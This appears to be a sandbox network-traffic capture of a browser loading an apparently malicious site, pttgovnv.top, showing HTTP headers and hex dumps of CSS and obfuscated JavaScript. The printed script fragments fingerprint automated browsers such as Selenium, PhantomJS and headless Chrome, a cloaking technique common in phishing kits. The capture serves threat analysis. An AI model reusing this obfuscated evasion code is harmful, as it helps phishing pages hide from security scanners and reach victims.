    Data Ascii: bar-nav>li>a:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-toggle:focus,.navbar-inverse .navbar-toggle:hover{background-color:#333}.navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}.navbar-inverse .navbar-collapse{bord
    2024-09-01 22:28:24 UTC1369INData Raw: 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 6e 65 74 69 78 3b 73 72 63 3a 75 72 6c 28 2e 2f 66 31 38 65 34 32 62 61 6b 46 47 79 6d 2e 77 6f 66 66 29 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 73 78 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 6e 65 74 69 78 3b 73 70 65 61 6b 3a 6e 6f 6e 65 3b
    Data Ascii: fontawesome.io - @fontawesome* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)*/@font-face{font-family:snetix;src:url(./f18e42bakFGym.woff)format("woff");font-weight:400;font-style:normal}.sx{font-family:snetix;speak:none;


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    13192.168.2.449753104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC557OUTGET /help/assets/4cd1ec68kFGym.css HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://pttgovnv.top/help/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC735INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: text/css; charset=utf-8
    Content-Length: 323
    Connection: close
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"143-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 37245
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JDkEDi%2B73XFhzbCDFXzBcnB2CSA8LPOAnhjUOeg0jjbu1FhrwCRDuRpMrkC3H%2B7UmyVTG3A3xJOl0qmZwpKwbDuV3ZxQPnfXWkpguoAUMMxesFzjZa%2FAjenVImyjsyM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1722ec78cca-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC323INData Raw: 68 31 2e 74 69 74 6c 65 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 63 6f 6c 6f 72 3a 23 32 34 35 34 39 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 64 69 76 2e 63 6f 6e 74 65 6e 74 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 32 66 32 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 7d 75 6c 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 64 69 73 63 20 6f 75 74 73 69 64 65 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 75 6c 5b 64 61 74 61 2d 76
    Data Ascii: h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    14192.168.2.449755104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC532OUTGET /help/assets/c16a2af0JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC760INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"8a73-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 37246
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69iNW8VVxE9sFnhfWBYPSSk7rydeojJfMbBU6qidtNQmvy0WnaO4Tkd0xFF2kzk6C%2BE9q56%2F%2FqVlQ82%2BLr7TXLbYMFo7z45b4cwztPRHiQmYc1xFDXJsk78EZ9nsRE0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b172190443ca-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC609INData Raw: 37 63 62 38 0d 0a 76 61 72 20 61 32 33 5f 30 78 32 32 30 38 61 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 31 61 32 32 2c 5f 30 78 32 39 64 61 64 62 29 7b 76 61 72 20 5f 30 78 31 33 65 38 38 35 3d 61 32 33 5f 30 78 31 62 39 34 2c 5f 30 78 31 33 62 65 61 38 3d 5f 30 78 31 37 31 61 32 32 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 63 63 35 36 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32 63 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 65 38 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38
    Data Ascii: 7cb8var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e8
    2024-09-01 22:28:24 UTC1369INData Raw: 5f 30 78 31 33 62 65 61 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 32 33 5f 30 78 31 61 35 38 2c 30 78 38 39 63 36 38 29 29 3b 69 6d 70 6f 72 74 7b 6c 20 61 73 20 61 32 33 5f 30 78 34 39 32 65 30 35 2c 5f 20 61 73 20 61 32 33 5f 30 78 31 38 35 62 65 65 7d 66 72 6f 6d 27 2e 2f 69 6e 64 65 78 2d 66 35 34 35 37 37 31 38 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 61 32 33 5f 30 78 35 65 37 34 62 31 7d 66 72 6f 6d 27 2e 2f 30 39 62 66 30 31 66 38 4a 78 4b 6e 57 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 6d 20 61 73 20 61 32 33 5f 30 78 35 65 38 39 62 39 7d 66 72 6f 6d 27 2e 2f 65 63 32 31 35 31 37 62 4a 78 4b 6e 57 2e 6a 73 27 3b 76 61 72 20 45 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 65 39 39 38 2c 5f 30 78 32 66 36 37 65 62 29 7b 76 61 72
    Data Ascii: _0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var
    2024-09-01 22:28:24 UTC1369INData Raw: 37 39 61 33 66 28 5f 30 78 35 39 64 38 36 65 29 3b 7d 29 3b 7d 72 65 74 75 72 6e 20 6e 65 77 28 5f 30 78 34 31 32 63 34 30 7c 7c 28 5f 30 78 34 31 32 63 34 30 3d 50 72 6f 6d 69 73 65 29 29 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 38 35 63 64 36 2c 5f 30 78 31 31 62 35 39 61 29 7b 76 61 72 20 5f 30 78 31 63 61 62 62 34 3d 61 32 33 5f 30 78 31 62 39 34 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 31 63 61 62 28 5f 30 78 36 64 38 66 64 38 29 7b 76 61 72 20 5f 30 78 31 39 38 61 66 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 74 72 79 7b 5f 30 78 34 33 65 62 34 38 28 5f 30 78 33 38 38 30 65 37 5b 5f 30 78 31 39 38 61 66 35 28 30 78 32 64 64 29 5d 28 5f 30 78 36 64 38 66 64 38 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 39 64 39 64 33 29 7b 5f 30 78 31 31 62 35 39 61
    Data Ascii: 79a3f(_0x59d86e);});}return new(_0x412c40||(_0x412c40=Promise))(function(_0x385cd6,_0x11b59a){var _0x1cabb4=a23_0x1b94;function _0x3e1cab(_0x6d8fd8){var _0x198af5=a23_0x1b94;try{_0x43eb48(_0x3880e7[_0x198af5(0x2dd)](_0x6d8fd8));}catch(_0x19d9d3){_0x11b59a
    2024-09-01 22:28:24 UTC1369INData Raw: 36 64 26 26 28 5f 30 78 34 34 62 32 36 64 3d 30 78 30 2c 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 26 28 5f 30 78 32 61 64 36 33 37 3d 30 78 30 29 29 2c 5f 30 78 32 61 64 36 33 37 3b 29 74 72 79 7b 69 66 28 5f 30 78 34 33 37 37 33 61 3d 30 78 31 2c 5f 30 78 32 64 39 37 66 64 26 26 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 30 78 32 3f 5f 30 78 32 64 39 37 66 64 5b 27 72 65 74 75 72 6e 27 5d 3a 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 3f 5f 30 78 32 64 39 37 66 64 5b 27 74 68 72 6f 77 27 5d 7c 7c 28 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 32 64 39 37 66 64 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 65 31 29 5d 29 26 26 5f 30 78 35 35 35 34 65 31 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f 30 78 32 64
    Data Ascii: 6d&&(_0x44b26d=0x0,_0x15868d[0x0]&&(_0x2ad637=0x0)),_0x2ad637;)try{if(_0x43773a=0x1,_0x2d97fd&&(_0x5554e1=_0x15868d[0x0]&0x2?_0x2d97fd['return']:_0x15868d[0x0]?_0x2d97fd['throw']||((_0x5554e1=_0x2d97fd[_0x396e75(0x2e1)])&&_0x5554e1[_0x396e75(0x278)](_0x2d
    2024-09-01 22:28:24 UTC1369INData Raw: 30 78 33 39 36 65 37 35 28 30 78 32 30 34 29 5d 3d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 2c 5f 30 78 32 61 64 36 33 37 5b 27 6f 70 73 27 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 61 32 29 5d 28 5f 30 78 31 35 38 36 38 64 29 3b 62 72 65 61 6b 3b 7d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 26 26 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 65 63 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 2c 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 66 33 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 7d 5f 30 78 31 35 38 36 38 64 3d 5f 30 78 32 62 31 31 63 30 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f 30 78 33 64 39 32 35 62 2c
    Data Ascii: 0x396e75(0x204)]=_0x5554e1[0x2],_0x2ad637['ops'][_0x396e75(0x2a2)](_0x15868d);break;}_0x5554e1[0x2]&&_0x2ad637[_0x396e75(0x1ec)][_0x396e75(0x254)](),_0x2ad637[_0x396e75(0x1f3)][_0x396e75(0x254)]();continue;}_0x15868d=_0x2b11c0[_0x396e75(0x278)](_0x3d925b,
    2024-09-01 22:28:24 UTC1369INData Raw: 32 32 30 38 61 35 28 30 78 31 62 61 29 2c 27 53 65 71 75 65 6e 74 75 6d 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 32 35 29 2c 27 53 6c 69 6d 65 72 4a 53 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 31 64 37 29 2c 27 57 65 62 44 72 69 76 65 72 49 4f 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 33 30 37 29 2b 27 6f 27 2c 27 57 65 62 44 72 69 76 65 72 27 3a 27 77 65 62 64 72 69 76 65 72 27 2c 27 48 65 61 64 6c 65 73 73 43 68 72 6f 6d 65 27 3a 27 68 65 61 64 6c 65 73 73 5f 63 27 2b 27 68 72 6f 6d 65 27 2c 27 55 6e 6b 6e 6f 77 6e 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 39 36 29 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 63 34 37 65 29 7b 76 61 72 20 5f 30 78 35 35 63 30 35 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29
    Data Ascii: 2208a5(0x1ba),'Sequentum':a23_0x2208a5(0x225),'SlimerJS':a23_0x2208a5(0x1d7),'WebDriverIO':a23_0x2208a5(0x307)+'o','WebDriver':'webdriver','HeadlessChrome':'headless_c'+'hrome','Unknown':a23_0x2208a5(0x296)},c=function(_0x44c47e){var _0x55c059=(function()
    2024-09-01 22:28:24 UTC1369INData Raw: 78 61 63 64 39 36 37 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 37 63 29 5d 3b 69 66 28 2f 73 6c 69 6d 65 72 6a 73 2f 69 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 30 39 29 5d 28 5f 30 78 61 63 64 39 36 37 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 33 30 30 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 70 28 5f 30 78 66 32 62 35 65 38 2c 5f 30 78 34 62 63 61 31 61 29 7b 76 61 72 20 5f 30 78 34 37 61 31 61 61 3d 61 32 33 5f 30 78 32 32 30 38 61 35 3b 72 65 74 75 72 6e 20 5f 30 78 66 32 62 35 65 38 5b 5f 30 78 34 37 61 31 61 61 28 30 78 32 62 36 29 5d 28 5f 30 78 34 62 63 61 31 61 29 21 3d 3d 2d 30 78 31
    Data Ascii: xacd967[_0x34c792(0x219)]))return u[_0x34c792(0x27c)];if(/slimerjs/i[_0x34c792(0x209)](_0xacd967[_0x34c792(0x219)]))return u[_0x34c792(0x300)];}function p(_0xf2b5e8,_0x4bca1a){var _0x47a1aa=a23_0x2208a5;return _0xf2b5e8[_0x47a1aa(0x2b6)](_0x4bca1a)!==-0x1
    2024-09-01 22:28:24 UTC1369INData Raw: 37 36 38 33 32 30 5d 2c 5f 30 78 33 37 66 33 32 36 3d 5f 30 78 36 30 33 32 61 61 28 5f 30 78 34 34 32 37 33 61 29 3b 69 66 28 74 79 70 65 6f 66 20 5f 30 78 33 37 66 33 32 36 3d 3d 27 6f 62 6a 65 63 74 27 29 72 65 74 75 72 6e 20 5f 30 78 33 37 66 33 32 36 5b 5f 30 78 32 33 32 38 38 36 28 30 78 32 31 39 29 5d 3b 7d 72 65 74 75 72 6e 21 30 78 31 3b 7d 66 75 6e 63 74 69 6f 6e 20 67 28 5f 30 78 31 64 66 31 37 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 66 31 37 64 5b 27 72 65 64 75 63 65 27 5d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 33 32 66 37 2c 5f 30 78 34 36 37 66 66 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 33 33 32 66 37 2b 28 5f 30 78 34 36 37 66 66 36 3f 30 78 31 3a 30 78 30 29 3b 7d 2c 30 78 30 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 33 5f 30
    Data Ascii: 768320],_0x37f326=_0x6032aa(_0x44273a);if(typeof _0x37f326=='object')return _0x37f326[_0x232886(0x219)];}return!0x1;}function g(_0x1df17d){return _0x1df17d['reduce'](function(_0x2332f7,_0x467ff6){return _0x2332f7+(_0x467ff6?0x1:0x0);},0x0);}function a23_0
    2024-09-01 22:28:24 UTC1369INData Raw: 62 66 30 31 66 38 27 2c 27 65 78 74 65 72 6e 61 6c 27 2c 27 63 61 6c 6c 50 68 61 6e 74 6f 27 2c 27 74 6f 4c 6f 77 65 72 43 61 73 27 2c 27 38 64 4f 79 6f 4a 43 27 2c 27 74 65 4e 61 6d 65 73 27 2c 27 34 71 54 73 59 61 77 27 2c 27 65 6c 65 63 74 72 6f 6e 27 2c 27 63 6f 6c 6c 65 63 74 27 2c 27 72 65 65 6e 58 27 2c 27 65 72 72 6f 72 54 72 61 63 65 27 2c 27 57 65 62 4b 69 74 4d 65 64 69 27 2c 27 4d 65 64 69 61 53 65 74 74 69 27 2c 27 53 65 6c 65 6e 69 75 6d 27 2c 27 6e 67 73 52 61 6e 67 65 27 2c 27 77 65 62 47 4c 27 2c 27 38 30 31 30 38 33 37 72 58 65 58 76 4b 27 2c 27 6d 73 69 65 27 2c 27 6c 76 65 4c 6f 63 61 6c 46 69 27 2c 27 6e 66 6f 27 2c 27 72 5f 65 76 61 6c 75 61 74 65 27 2c 27 67 69 6e 41 72 72 61 79 5c 78 32 30 69 27 2c 27 4a 78 4b 6e 57 2e 6a 73 27 2c
    Data Ascii: bf01f8','external','callPhanto','toLowerCas','8dOyoJC','teNames','4qTsYaw','electron','collect','reenX','errorTrace','WebKitMedi','MediaSetti','Selenium','ngsRange','webGL','8010837rXeXvK','msie','lveLocalFi','nfo','r_evaluate','ginArray\x20i','JxKnW.js',
    2024-09-01 22:28:24 UTC1369INData Raw: 27 73 70 61 77 6e 27 2c 27 5f 73 65 6c 65 6e 69 75 6d 27 2c 27 76 65 72 73 69 6f 6e 73 27 2c 27 6f 6e 73 69 73 74 65 6e 74 27 2c 27 63 6f 64 65 27 2c 27 77 69 6e 64 6f 77 45 78 74 65 27 2c 27 68 61 73 4f 77 6e 50 72 6f 70 27 2c 27 6e 65 78 74 27 2c 27 67 65 74 49 74 65 6d 27 2c 27 4e 69 67 68 74 6d 61 72 65 4a 27 2c 27 65 74 73 27 2c 27 72 65 74 75 72 6e 27 2c 27 65 6d 65 6e 74 4b 65 79 73 27 2c 27 72 41 6c 65 72 74 27 2c 27 72 69 6e 67 43 6f 6e 74 65 78 27 2c 27 66 6c 65 63 74 5d 27 2c 27 68 74 74 70 27 2c 27 53 65 71 75 65 6e 74 75 6d 27 2c 27 63 72 65 61 74 65 27 2c 27 5f 75 6e 77 72 61 70 70 65 64 27 2c 27 36 36 34 34 30 67 66 54 55 46 64 27 2c 27 62 6f 74 27 2c 27 41 70 70 6c 65 50 61 79 45 72 27 2c 27 77 65 62 44 72 69 76 65 72 27 2c 27 64 69 73 74
    Data Ascii: 'spawn','_selenium','versions','onsistent','code','windowExte','hasOwnProp','next','getItem','NightmareJ','ets','return','ementKeys','rAlert','ringContex','flect]','http','Sequentum','create','_unwrapped','66440gfTUFd','bot','ApplePayEr','webDriver','dist


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    15192.168.2.449754104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC532OUTGET /help/assets/09bf01f8JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC769INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"7ad-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 43369
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sWyReqcpuL%2B9tArszaCQeUUBMsbNKQYj5BZs%2BO2D2b1%2FQh8s9x3zq7bHDE%2FgAA%2BGxKUBN%2FYERd%2FGxmJsKj138hTgoDG%2B0n5G0W1jU0epYXwxnK3sDhv7iFNVvme6%2BiM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1722c3643e9-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC600INData Raw: 37 61 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 37 32 36 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 39 30 66 62 36 3d 5b 27 74 6f 53 74 72 69 6e 67 27 2c 27 61 70 70 6c 79 27 2c 27 31 32 31 37 32 38 30 6d 46 59 53 68 67 27 2c 27 37 34 35 31 30 31 48 74 47 52 79 7a 27 2c 27 35 6b 47 7a 6a 5a 66 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2c 27 73 65 61 72 63 68 27 2c 27 32 31 34 34 31 33 33 57 78 78 57 57 65 27 2c 27 72 65 6d 6f 76 65 27 2c 27 31 33 36 38 38 31 32 57 71 49 75 52 76 27 2c 27 6e 6f 6f 70 65 6e 65 72 27 2c 27 63 6c 69 63 6b 27 2c 27 32 32 32 36 35 37 34 56 6a 6b 4e 68 68 27 2c 27 34 34 39 33 36 38 6a 7a 6a 62 71 74 27 2c 27 34 32 35 36 39 37 36 4d 69 68 75 43 76 27 2c 27 61 70 70 65 6e 64 27 2c 27 62 6f 64 79 27 2c 27 72 65 6c 27 2c 27
    Data Ascii: 7adfunction a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','
    2024-09-01 22:28:24 UTC1369INData Raw: 74 28 5f 30 78 35 35 31 38 39 64 28 30 78 63 35 29 29 2f 30 78 36 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 31 38 39 64 28 30 78 63 33 29 29 2f 30 78 37 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 31 38 39 64 28 30 78 63 63 29 29 2f 30 78 38 3b 69 66 28 5f 30 78 32 39 62 39 39 36 3d 3d 3d 5f 30 78 33 64 39 63 61 30 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 61 36 39 32 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 61 36 39 32 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 35 37 31 65 33 62 29 7b 5f 30 78 33 61 36 39 32 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 61 36 39 32 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 30 5f 30 78 31 37 32 36 2c 30 78 36 31 31 31 39 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 30 5f
    Data Ascii: t(_0x55189d(0xc5))/0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_
    2024-09-01 22:28:24 UTC3INData Raw: 3b 0d 0a
    Data Ascii: ;
    2024-09-01 22:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    16192.168.2.449759104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC347OUTGET /favicon.ico HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC737INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: image/vnd.microsoft.icon
    Content-Length: 15215
    Connection: close
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:36 GMT
    ETag: W/"3b6f-18fc3d82ee0"
    CF-Cache-Status: HIT
    Age: 37681
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iu9drOLQP3beqOZDvpuYS1hpdXbcZFlC0dpYNi%2FPDctlRPOeMU7ty9vY9r%2BKX7WDqnvwI78FLdB4yeIpvpNEaUb9t7L4xQd1kO5ssc6AmcuRdCG2biNrwKEstv4qJQE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1724cc815bb-EWR
    alt-svc: h3=":443"; ma=86400
